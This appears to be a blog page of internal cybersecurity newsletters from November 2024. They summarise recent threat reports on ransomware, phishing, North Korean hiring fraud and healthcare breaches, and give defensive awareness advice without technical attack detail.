68% of healthcare workers report supply chain cyberattacks.

82% of incidents resulted in disruptions to patient care.

Attacks cause delays in procedures and increase patient risks.

Ransomware and business email compromise are growing threats.

Further reading: Security Magazine - Supply Chain Attacks.

Change Healthcare Breach – Key Insights and Implications

In February 2024, Change Healthcare experienced a substantial ransomware attack, compromising the personal, financial, and medical information of approximately 100 million Americans. This incident highlights critical vulnerabilities within the healthcare sector and raises concerns about protecting patient data.

Key Insights:

Breach Scope: Sensitive data, including Social Security numbers, medical records, and billing information, was exposed, impacting millions of patients.

Financial Impact: UnitedHealth Group, Change Healthcare’s parent company, incurred breach-related costs totaling $2.457 billion, including $1.521 billion in direct response expenses.

Ransom Payment: Change Healthcare paid a $22 million ransom to the BlackCat ransomware group in an attempt to prevent further data exposure.

Further Reading: Change Healthcare Breach Hits 100M Americans – Krebs on Security

November 2024 Threat Intelligence Newsletter

November 11, 2024

This is a monthly newsletter I put together for our internal security team with a lean towards phishing and healthcare. Created with help from ChatGPT.

Fake Job Applications Deliver Dangerous Malware

Summary: A spear-phishing campaign is targeting HR professionals with fake job applications containing the More_eggs malware. Operated by the Golden Chickens group as part of a Malware-as-a-Service (MaaS) platform, More_eggs is a sophisticated backdoor used by multiple threat actors to infiltrate corporate networks.

Key Insights (Technical):

Delivery Method: The malware is delivered via malicious Windows Shortcut files (.LNK files) disguised as resumes. When opened, these files execute scripts without raising suspicion.

Execution Technique: The attack leverages living-off-the-land binaries (LOLBins) like wscript.exe to run malicious JavaScript code, bypassing traditional security measures.

Capabilities:

Backdoor Access: Establishes a stealthy backdoor for persistent access.

Payload Deployment: Can download and execute additional malware modules, including ransomware or credential stealers.

Reconnaissance: Gathers system information and can move laterally within the network.

Command and Control (C2): Communicates with C2 servers over HTTP/S protocols, using encrypted channels to evade detection.

Avoidance of Detection: Uses legitimate Windows processes to mask malicious activities, making it harder for security solutions to detect the intrusion.

For further details, read the full article on The Hacker News.

New Ransomware Strain Targeting Healthcare

The U.S. Department of Health and Human Services (HHS) issued a warning about a new ransomware strain, Trinity, which is actively targeting the healthcare sector. Trinity uses techniques like encrypting data and demanding ransoms within 24 hours. It has connections to other ransomware families such as Venus and 2023Lock.

Technical Key Insights:

Exploits Remote Desktop Protocol (RDP) and open ports

Uses privilege escalation to gain higher access

Encrypts critical systems rapidly after infiltration

Further reading: The Record - Trinity Ransomware Alert.

Emerging Cybersecurity Threats Highlighted in HP Wolf Security Report

The September 2024 HP Wolf Security Threat Insights Report identifies key trends in cyberattacks, including a surge in document-based malware, with 61% of threats delivered via email attachments. Attackers are increasingly using malicious archives and PDFs to bypass detection, leveraging techniques like HTML smuggling and exploiting vulnerabilities in outdated software. Threat actors are also using Generative AI to write sophisticated malware, such as AsyncRAT.

Key Insights:

39% of threats delivered in archives

Rise in AI-generated malware

Increased exploitation of known vulnerabilities

Further reading: HP Wolf Security Threat Insights Report.

North Korean IT Worker Incident Highlights Hiring Risks

Recommended Protections:

Implement strict identity verification for remote workers.

Conduct thorough background checks with global databases.

Regularly monitor employee network activity for unusual behavior.

Further reading: GBHackers - North Korean IT Worker Incident.

User-Centric Security Design Inspired by Disney

A recent article from KnowBe4 discusses how organizations can improve security by observing how employees naturally work, similar to Disney’s strategy of observing guests before building paths. The concept of "desire paths" shows that security controls should be designed around actual workflows, reducing friction and improving compliance. By aligning security with user behavior, organizations can mitigate risky workarounds and foster a more secure environment.

Further reading: KnowBe4 - Security Highways.

Healthcare Supply Chain Attacks on the Rise

A recent Proofpoint report reveals that 68% of healthcare workers have faced a supply chain cyberattack, with 82% of these incidents affecting patient care.

Key Insights:

68% of healthcare workers report supply chain cyberattacks.

82% of incidents resulted in disruptions to patient care.

Attacks cause delays in procedures and increase patient risks.

Ransomware and business email compromise are growing threats.

Further reading: Security Magazine - Supply Chain Attacks.

Microsoft’s Deceptive Honeypot Strategy Targets Phishers

Microsoft has launched a clever security strategy by creating fake Azure tenants to lure phishing attackers into honeypots. These realistic tenant environments mimic legitimate setups, tricking attackers into interacting with them. This allows Microsoft to gather valuable intelligence on phishing methods and infrastructure, which can be used to strengthen defenses and share with the wider security community. By engaging with these fake environments, phishers waste time while Microsoft gains crucial insights.

Further reading: BleepingComputer - Microsoft Honeypots.

Mobile-First Cyber Attacks on the Rise

Cyber attackers are increasingly adopting a "mobile-first" strategy, as highlighted by a new report from Zimperium. With 83% of phishing sites now targeting mobile devices and a 13% rise in mobile malware, employees’ personal devices pose a growing risk to organizations. As more employees use their smartphones for work-related tasks, organizations need to bolster mobile security and educate employees on safe practices through security awareness training.

Further reading: KnowBe4 - Mobile-First Attack Strategy.

Cybercriminals Exploiting Steam for Malware Distribution

A recent investigation highlights how cybercriminals are using Steam profiles to exploit a technique called Dead Drop Resolver (DDR) to hide Command and Control (C2) addresses within user profiles. Attackers have leveraged well-known infostealers like Vidar, Lumma, and MetaStealer to extract sensitive data from infected systems by using platforms like Steam and Telegram to evade detection.

Technical Key Insights:

Attackers embed C2 addresses in Steam profiles.

Infostealers target credentials and system data.

Use of obfuscated code and stolen certificates.

Further reading: RT Solar Blog. <---- .ru site

Rise in Phishing Attacks with AI and Impersonation Tactics

A new report from KnowBe4 reveals a 28% rise in phishing attacks during Q2 2024, with 89% of attacks involving brand impersonation. Cybercriminals are increasingly using AI-powered phishing toolkits, making it easier for less-skilled attackers to execute sophisticated campaigns. Commodity phishing attacks, primarily using hyperlinks, have surged, overwhelming organizations' defenses. With impersonation tactics being a dominant trend, organizations must enhance defenses against these evolving threats.

Key Insights:

28% increase in phishing attacks in Q2 2024.

89% of phishing emails involve impersonation.

Commodity phishing attacks up 2,700% compared to normal baselines.

Further reading: KnowBe4 Report.

Phishing-as-a-Service Platform "Sniper Dz" Exposed

A recent investigation reveals the rise of the phishing-as-a-service (PhaaS) platform "Sniper Dz," which is responsible for over 140,000 phishing websites. The platform offers phishing templates targeting major brands and hides malicious content behind proxy servers to evade detection. Additionally, attackers can exfiltrate credentials to centralized servers controlled by Sniper Dz. This growing platform enables less-skilled attackers to launch sophisticated phishing attacks with ease.

Further reading: Unit 42 - Sniper Dz PhaaS.

Dark Angels Ransomware Group Exposed

A recent investigation uncovers the stealth tactics of the Dark Angels ransomware group, which targets high-value systems with Babuk and RagnarLocker-based ransomware. Their techniques include double extortion, data exfiltration, and selective ransomware deployment to minimize detection.

Technical Key Insights:

Uses Babuk ransomware on Windows and RagnarLocker variants on Linux/ESXi servers.

Employs double extortion tactics, stealing data before encryption.

Leverages encrypted communication channels to evade detection.

Further reading: Zscaler - Dark Angels Ransomware Group.

North Korean IT Worker Fraud

SecureWorks reports that North Korean IT workers are fraudulently obtaining remote jobs to access sensitive systems and generate revenue for the regime. These individuals disguise their identities, use VPNs to hide their location, and exploit company resources once hired.

Key Insights:

Perform thorough background checks on freelance and remote candidates.

Monitor network access for unusual activity, especially from VPNs.

Educate hiring managers on this growing threat.

Further Reading: Fraudulent North Korean IT Worker Schemes

Health Care and Social Assistance Sector at Risk

Cyber threats in the Health Care and Social Assistance sector are intensifying, with phishing and social engineering attacks being the most prevalent. Organizations need to prioritize automation and Digital Risk Protection strategies to defend against these sophisticated threats.

Key Insights:

51.55% of incidents are phishing attacks using spearphishing links.

24.76% of attacks exploit public-facing applications.

Automation reduces incident containment time to 1 minute, compared to 2 hours 34 minutes for manual responses.

Further Reading: ReliaQuest Health Care Threat Landscape

AI-Driven Malware and Persistent Ransomware Threats

Check Point's Global Threat Index for September 2024 highlights the rising use of AI in malware creation, with AsyncRAT becoming one of the top threats. AI-powered scripts are being used to deliver malware like AsyncRAT through techniques such as HTML smuggling, showcasing how threat actors with limited technical skills can now leverage AI to create sophisticated attacks. This evolution underscores the need for organizations to adopt proactive security strategies.

In addition, RansomHub, a rebranded Ransomware-as-a-Service group, continues to dominate the ransomware scene, accounting for 17% of reported attacks. Other prominent malware families include FakeUpdates, targeting organizations worldwide, and Androxgh0st, which exploits vulnerabilities across platforms.

Key Insights:

51.55% of the most prevalent malware was related to phishing campaigns, with AI-driven techniques emerging.

RansomHub remains the top ransomware group with a significant global impact.

Joker leads mobile malware, targeting Android users via SMS theft and premium service fraud.

Further Reading: Check Point Threat Intelligence Report

Trinity Ransomware Hits Healthcare Sector

The Trinity ransomware group is targeting healthcare organizations with double-extortion tactics, gaining access through phishing emails and software vulnerabilities. This ransomware not only encrypts data but also steals it, pressuring victims to pay or risk exposure of sensitive information. Two healthcare providers have already been attacked, with 330GB of data compromised from a U.S.-based provider.

Key Insights:

Double extortion tactics increase the urgency for victims to pay.

Initial access often occurs through phishing or vulnerabilities.

Healthcare is a prime target due to critical operations needing quick recovery.

Further Reading: Trinity Ransomware Targets Healthcare

Threat Intelligence Update: Black Basta’s Social Engineering Tactics via Microsoft Teams

The Black Basta ransomware group has employed a sophisticated social engineering campaign targeting organizations through Microsoft Teams. By signing user emails up for multiple spam sources, Black Basta overwhelms the target with unwanted messages. Threat actors then contact the user, impersonating IT support and offering assistance with the email flood. During this call, the attacker convinces the user to install remote access software like Quick Assist or AnyDesk, providing them unauthorized access to the network. Once inside, the attackers can harvest credentials and potentially deploy ransomware.

Key Insights:

Attackers use a flood of spam emails to distract and stress targets.

Impersonation of IT support builds credibility and increases the chance of remote access.

This tactic highlights the need for training employees to verify unexpected IT requests and avoid downloading unapproved software.

Further Reading: ReliaQuest Blog on Black Basta's Techniques

Q3 2024 Ransomware Trends

The ReliaQuest Q3 2024 ransomware report highlights significant shifts in the ransomware landscape, with new groups gaining prominence and using sophisticated tactics to escalate their attacks. RansomHub has overtaken LockBit as the most active group, experiencing an 800% rise in postings from Q1 to Q3. Their growth is attributed to aggressive recruiting and lucrative profit-sharing, which has drawn affiliates from other disrupted groups. This group, along with Play ransomware, continues to exploit vulnerabilities in VPNs and public-facing applications, demonstrating the persistent risk posed by unpatched systems.

Key Insights:

RansomHub’s Rapid Rise: RansomHub posted 195 times in Q3, an 800% increase from Q1, leveraging a 90/10 profit-sharing model to attract affiliates.

Expansion into ESXi Environments: Play ransomware’s new Linux variant targets VMware ESXi servers, broadening its impact across platforms.

High-Risk Sectors: Professional services, healthcare, and manufacturing sectors are top targets due to potential operational disruptions.

Vulnerability Exploits: Attackers frequently gain access through unpatched VPNs and other internet-facing applications, emphasizing the need for timely patch management.

Further Reading: ReliaQuest Q3 Ransomware Report

Update: Q3 2024 Brand Phishing Trends

Check Point Research’s Q3 2024 report reveals that Microsoft continues as the most impersonated brand in phishing attacks, accounting for 61% of brand phishing attempts. Apple (12%) and Google (7%) follow, with new additions Alibaba and Adobe rounding out the top 10. These attacks commonly target the technology, social media, and banking sectors, as cybercriminals exploit brand familiarity to deceive users and capture credentials or payment information. Notably, new phishing sites targeting WhatsApp and Alibaba highlight the evolving strategies of threat actors seeking to exploit user trust.

Key Insights:

Microsoft Dominance: Microsoft phishing attempts made up 61% of brand impersonation attacks, with Apple and Google also highly targeted.

Sector Focus: Technology and social networks were the most impersonated sectors, followed by banking.

Evolving Phishing Tactics: Phishing websites like whatsapp-io.com and alibabashopvip.com show attackers adapting to impersonate new brands.

Further Reading: Check Point’s Q3 2024 Brand Phishing Report.

Global Surge in Cyber Attacks in Q3 2024

Check Point’s Q3 2024 report highlights a significant 75% increase in global cyber attacks compared to last year, with each organization facing an average of 1,876 weekly attacks. Sectors most impacted include Education/Research (3,828 weekly attacks), Government/Military (2,553), and Healthcare (2,434), reflecting the increased focus on these industries. Africa saw the highest regional attack rate, averaging 3,370 weekly, up 90% from 2023, while North America experienced the most ransomware attacks, making up 57% of incidents worldwide. Manufacturing was the top ransomware target, followed by Healthcare and Retail/Wholesale.

Key Insights:

Attack Growth by Sector: The Hardware Vendor industry had the largest increase in attacks, surging by 191%.

Regional Hotspots: Africa, Latin America, and Europe saw the steepest rises, with Europe experiencing an 86% year-over-year spike.

Ransomware Targets: The Manufacturing sector accounted for 30% of ransomware incidents, underscoring cybercriminals' focus on high-disruption industries.

Further Reading: Check Point Q3 2024 Report.

North Korean Cybercriminal Infiltrates UK Company

A UK-based organization recently suffered a breach after inadvertently hiring a North Korean cybercriminal posing as a remote IT worker. Once hired, the attacker used insider access to extract sensitive information and eventually demanded a ransom for its non-disclosure. This case highlights the importance of strict hiring processes for remote roles and enhanced security practices.

Key Insights:

Vetting Remote Employees: Conduct rigorous background checks to confirm credentials.

Data Security: Monitor access and behavior for early threat detection.

Remote Work Risks: Be mindful of cyber threats exploiting virtual roles.

Further Reading: KnowBe4 Article; KnowBe4 10 Hiring Updates

Partnership Between Scattered Spider and RansomHub

ReliaQuest reports a new collaboration between the Scattered Spider and RansomHub groups, merging advanced social engineering skills with network-compromising expertise to target enterprises globally. The partnership leverages RansomHub's effective 90/10 profit-sharing model, attracting experienced threat actors from disrupted groups. This collaboration allows attackers to target critical virtual infrastructures, such as ESXi servers, which host key applications, enabling high-impact ransomware attacks that pressure victims to pay swiftly.

Key Insights:

Targeting of ESXi Servers: These servers, often running multiple virtual machines, are attractive for ransomware attacks as they disrupt operations across organizations.

Social Engineering Tactics: Scattered Spider's expertise in impersonating IT staff aids in gaining unauthorized access to organizational networks.

Rising Threat of RansomHub: RansomHub has rapidly gained dominance, surpassing groups like LockBit, indicating a strategic shift in ransomware collaborations and effectiveness.

For more details, explore the full article at ReliaQuest.

Social Engineering Exploits Valid Accounts

Recent incidents highlight how threat actors are compromising legitimate accounts through social engineering tactics. By manipulating individuals into divulging sensitive information or performing specific actions, attackers gain unauthorized access to systems and data. This method often involves impersonating trusted entities or creating convincing scenarios to deceive targets.

Key Insights:

Impersonation Tactics: Attackers frequently pose as IT support or company executives to extract credentials.

Phishing Campaigns: Sophisticated emails and messages are crafted to appear authentic, luring recipients into providing access details.

Insider Threats: Compromised accounts can be used to launch further attacks within an organization, making detection challenging.

Further Reading: KnowBe4 Article on Social Engineering Exploits.

North Korean Group Adopts Play Ransomware

Unit 42 has identified that the North Korean state-sponsored threat group, Jumpy Pisces (also known as Andariel), has begun collaborating with the Play ransomware group, Fiddling Scorpius. This marks a significant shift in Jumpy Pisces' tactics, moving from traditional cyber espionage to active participation in ransomware operations. The group gained initial access to networks via compromised user accounts, deploying tools like Sliver and their custom malware, DTrack, to facilitate lateral movement and persistence. This collaboration underscores the evolving ransomware landscape, where nation-state actors are increasingly engaging in financially motivated cybercrime.

Key Insights:

Tactical Shift: Jumpy Pisces is now utilizing existing ransomware infrastructures, indicating a move towards financial cybercrime.

Advanced Tools: The group employs sophisticated tools such as Sliver and DTrack for network infiltration and persistence.

Global Targeting: Their activities are expected to target a wide range of victims worldwide, necessitating heightened vigilance.

Further Reading: Unit 42 Article on Jumpy Pisces and Play Ransomware.

Key Cyber Threat Actors in 2024

ReliaQuest's recent analysis identifies five prominent cyber threat actors significantly impacting the cybersecurity landscape in 2024:

RansomHub: Emerging as a dominant ransomware group, RansomHub has surpassed previous leaders like LockBit and ALPHV, posing substantial risks to organizations globally.

IntelBroker: As the acting administrator of BreachForums, IntelBroker oversees activities on one of the largest English-language cybercriminal forums, facilitating various malicious operations.

APT41: A Chinese state-affiliated group, APT41 continues to engage in espionage activities, targeting sectors such as healthcare, telecommunications, and finance.

APT29: Known for its sophisticated espionage campaigns, this Russian state-affiliated group remains active in infiltrating governmental and private sector networks.

KillSec: Originally aligned with the "Anonymous" hacktivist collective, KillSec has recently shifted towards financially motivated ransomware activities, increasing its threat profile.

Further Reading: ReliaQuest Article on Critical Threat Actors.

Halloween’s Digital Threats of 2024

Halloween brings tales of horror, but in 2024, some of the scariest threats come from the digital realm. Cybercriminals are increasingly using advanced tools to target individuals and organizations with new forms of AI-driven malware, IoT exploits, and social engineering tricks that play on our trust.

Key Insights:

AI-Powered Attacks: These cyber “ghosts” can adapt to evade detection, making attacks like spear-phishing and deepfakes more convincing.

IoT Vulnerabilities: Over 20,000 vulnerable IoT devices, including cameras and routers, have become entry points for attackers, posing risks to privacy and security.

Social Media Exploitation: Personal data scraped from social platforms is being weaponized for phishing and blackmail, creating "digital dossiers" for targeted attacks.

Fake Calls and Malware: Scammers posing as bank representatives are using fake calls to steal sensitive information, a trick that’s led to an increase in identity theft and financial loss.

Dating Apps and Location Data: Privacy risks on dating apps, including inadvertent location sharing, are turning digital encounters into real-life safety concerns.

Further Reading: Check Point’s guide on Halloween Cyber Threats.

November 2024 Cybersecurity Awareness Newsletter

November 8, 2024

This is a newsletter I share internally as part of our internal security awareness program. Feel free to take and use in your organization. Created with help from ChatGPT

Fake Job Applications Deliver Dangerous Malware

Summary: A spear-phishing campaign has been targeting HR professionals with malicious job applications. Attackers use fake resumes containing More_eggs malware, a backdoor designed to steal credentials. This malware, part of a Malware-as-a-Service (MaaS) platform operated by the Golden Chickens group, can be used by multiple threat actors. The attack chain involves malicious Windows shortcut (LNK) files that initiate the infection upon execution, allowing attackers to perform reconnaissance and drop additional payloads.

Key Insight: Be cautious when handling job applications, especially those involving downloadable files from unknown sources.

For further details, read the full article on The Hacker News.

Data Privacy Risks in Connected Cars

Modern connected vehicles collect vast amounts of data, including driving habits, location, and even biometric information like voice commands. A recent analysis by CHOICE reveals that many popular car brands share this data with third-party companies, raising privacy concerns. Brands like Kia, Hyundai, and Tesla collect and share voice and video data, while others gather driving behaviors. This highlights the importance of understanding your car’s data collection practices and opting out where possible.

Further reading: CHOICE - Connected Cars Tracking Your Data.

North Korean Hackers Targeting Job Seekers

A new campaign by North Korean hackers is targeting job seekers, particularly in the tech industry, according to a recent report. Hackers impersonate recruiters on platforms like LinkedIn, luring individuals into downloading malware disguised as video conferencing tools. The malware is designed to steal cryptocurrency and sensitive corporate data, posing risks to both individuals and organizations. Job seekers should remain cautious when interacting with unsolicited offers and recruiters.

Further reading: KnowBe4 - North Korean Hackers.

Election Season and Cybersecurity Concerns

As the 2024 election season progresses, a recent Malwarebytes survey reveals that 74% of respondents consider it a risky time for personal information. Fears of scams, privacy breaches, and cyber interference are high, with 52% of people expressing concern about falling prey to scams through political ads. Many are taking precautions, such as using two-factor authentication and password managers, to secure their data.

Key Insights:

74% view election season as risky for personal data.

52% fear scams via political ads.

Increased adoption of security practices like two-factor authentication.

Further reading: Malwarebytes - Election Season Raises Fears.

North Korean IT Worker Incident Highlights Hiring Risks

Recommended Protections:

Implement strict identity verification for remote workers.

Conduct thorough background checks with global databases.

Regularly monitor employee network activity for unusual behavior.

Further reading: GBHackers - North Korean IT Worker Incident.

Mobile-First Cyber Attacks on the Rise

Further reading: KnowBe4 - Mobile-First Attack Strategy.

Microsoft Spoofing Threats on the Rise

A recent report from Harmony Email & Collaboration highlights over 5,000 fake Microsoft emails targeting organizations within a single month. These emails, often impersonating legitimate administrators, use sophisticated obfuscation techniques, making it difficult for users to detect. The risks include account takeovers, ransomware, and data theft.

Further reading: Check Point Blog.

New VPN Credential Attack Uses Sophisticated Social Engineering

A recent attack uncovered by security researchers targets organizations using VPNs through a combination of social engineering, fake login sites, and phone calls. Attackers impersonate a helpdesk, direct users to a spoofed VPN login page, and steal credentials. They also prompt users for multi-factor authentication (MFA) codes to gain access to corporate networks. This attack highlights the importance of user vigilance and strong security training.

Attack Chain:

Impersonation of helpdesk.

Directs victim to fake VPN login page.

Steals credentials and MFA codes.

Further reading: KnowBe4 - New VPN Credential Attack.

Operation Kaerb Takedown

Operation Kaerb successfully dismantled iServer, a Phishing-as-a-Service platform responsible for facilitating mobile credential theft targeting nearly half a million victims. iServer enabled low-skilled criminals to unlock stolen phones by phishing for user credentials. This takedown is a reminder of the evolving tactics cybercriminals use and underscores the importance of staying vigilant against mobile-focused phishing attacks.

Further Reading: Operation Kaerb on KnowBe4

Sextortion Scams on the Rise

Our team has recently been targeted by sextortion scams, where attackers use publicly available information to create threatening messages designed to elicit fear and urgency. These scams often appear more credible by including personal details. If you receive such a message, avoid engagement or payment—report it to our security team immediately by using the suspicious email button in Outlook.

Further Reading: KnowBe4 Article on Sextortion Scams.

Update: Q3 2024 Brand Phishing Trends

Key Insights:

Microsoft Dominance: Microsoft phishing attempts made up 61% of brand impersonation attacks, with Apple and Google also highly targeted.

Sector Focus: Technology and social networks were the most impersonated sectors, followed by banking.

Evolving Phishing Tactics: Phishing websites like whatsapp-io.com and alibabashopvip.com show attackers adapting to impersonate new brands.

Further Reading: Check Point’s Q3 2024 Brand Phishing Report.

North Korean Cybercriminal Infiltrates UK Company

Key Insights:

Vetting Remote Employees: Conduct rigorous background checks to confirm credentials.

Data Security: Monitor access and behavior for early threat detection.

Remote Work Risks: Be mindful of cyber threats exploiting virtual roles.

Further Reading: KnowBe4 Article; KnowBe4 10 Hiring Updates

North Korean Threat Actors Pose as Recruiters to Target Job Seekers

Palo Alto Networks' Unit 42 recently uncovered a campaign in which North Korean threat actors pose as recruiters to lure tech job seekers into downloading malware disguised as legitimate communication tools. Known as the "Contagious Interview" campaign, this operation involves malware variants like BeaverTail and InvisibleFerret, which are capable of stealing credentials, exfiltrating sensitive files, and targeting cryptocurrency wallets. Victims are approached on professional platforms like LinkedIn, and then directed to install fake interview applications that serve as a conduit for malware.

Key Insights:

Sophisticated Impersonation Tactics: Attackers convincingly impersonate recruiters and use realistic job offers to build trust with targets.

Multifunctional Malware: The malware used can harvest browser passwords, access cryptocurrency wallets, and install backdoors, enhancing its threat potential.

Organizational Risk: Beyond individual targets, successful infections on company devices can lead to broader data breaches within organizations.

As remote work and digital hiring continue to rise, it’s critical to validate the legitimacy of recruiters and avoid downloading unverified software for job interviews.

Further Reading: Unit 42 Report on North Korean Recruitment Tactics

Pig Butchering Scams Target Job Seekers

Proofpoint has identified a new twist in cryptocurrency fraud, known as "Pig Butchering," targeting job seekers. Scammers posing as recruiters lure victims into fake job roles, eventually guiding them to invest in fraudulent cryptocurrency platforms. Victims see initial "profits" to build trust, but ultimately lose their entire investment. These scams often begin on social media, moving to platforms like WhatsApp or Telegram for further manipulation.

Further Reading: Proofpoint Article.

Foreign Disinformation on U.S. Hurricanes

Recent intelligence shows that operatives from Russia, China, and Cuba have spread false information about U.S. hurricanes to deepen political divides. AI-generated images and misleading posts claimed federal relief was denied or funds were diverted to foreign conflicts, aiming to erode trust in U.S. disaster response. Be cautious of divisive narratives or unverified disaster images on social media, as they may be part of coordinated disinformation efforts.

Further Reading: NBC News Article.

Social Engineering Exploits Valid Accounts

Key Insights:

Impersonation Tactics: Attackers frequently pose as IT support or company executives to extract credentials.

Phishing Campaigns: Sophisticated emails and messages are crafted to appear authentic, luring recipients into providing access details.

Insider Threats: Compromised accounts can be used to launch further attacks within an organization, making detection challenging.

Further Reading: KnowBe4 Article on Social Engineering Exploits.

Major Data Breach at Change Healthcare Affects 100 Million Americans

In February 2024, Change Healthcare, a leading U.S. healthcare technology company, experienced a significant ransomware attack that compromised the personal, financial, and medical information of approximately 100 million individuals. The breach disrupted healthcare services nationwide, highlighting vulnerabilities in the sector's cybersecurity defenses.

Key Insights:

Scope of Breach: The attack exposed sensitive data, including medical records, billing information, and personal identifiers such as Social Security numbers and driver's license details.

Financial Impact: UnitedHealth Group, Change Healthcare's parent company, reported direct breach response costs of $1.521 billion and total cyberattack impacts of $2.457 billion.

Ransom Payment: The company paid a $22 million ransom to the BlackCat ransomware group in an attempt to secure the stolen data.

Further Reading: Change Healthcare Breach Hits 100M Americans – Krebs on Security

Student Loan Phishing Scams Targeting Millions

Cybercriminals are exploiting confusion around student loan forgiveness with a surge in phishing emails targeting millions of Americans. These emails use advanced techniques to look legitimate and bypass email filters, making them harder to detect.

What You Can Do to Stay Safe:

Watch for Red Flags: Be cautious with emails related to student loans, especially those asking for immediate action or personal information. Verify any claims by contacting your loan service provider directly.

Check the Source: Always look closely at the sender’s email address. Official communication will come from verified addresses, not random or suspicious-looking senders.

Enable Multi-Factor Authentication (MFA): Use MFA on your financial accounts for extra security, making it harder for attackers to gain access if they obtain your credentials.

Be Prepared: Know how to report a suspicious email in your email system, and don’t hesitate to delete anything that seems off.

Further Reading: Check Point Blog.